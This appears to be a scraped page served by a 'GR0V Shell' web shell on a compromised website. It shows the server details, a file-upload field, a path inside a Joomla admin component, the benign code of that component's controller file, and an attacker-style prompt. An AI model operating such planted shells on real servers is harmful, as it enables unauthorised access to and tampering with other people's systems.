? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/public_html/old/administrator/components/com_xijc/controllers/
File Upload :
Current File : /home/admin/public_html/old/administrator/components/com_xijc/controllers/cpanel.php

<?php
// no direct access
defined('_JEXEC') or die('Restricted access');
 
class XiJCControllerCPanel extends JController 
{
  
	function __construct($config = array())
	{
		parent::__construct($config);
	}
		
    function display() 
	{
		parent::display();
    }
	
    function updates()
	{
		$id = JRequest::getVar('updateId', 0 , 'GET');
		$viewName	= JRequest::getCmd( 'view' , 'cpanel' );
				// Get the document object
		$document	=& JFactory::getDocument();
		// Get the view type
		$viewType	= $document->getType();
	
		$view		=& $this->getView( $viewName , $viewType );

		$layout		= JRequest::getCmd( 'layout' , 'cpanel.updates' );
		$view->setLayout( $layout );
		//echo parent::display();
		echo $view->updates();
	}
    
}

T1KUS90T
  root-grov@210.1.60.28:~$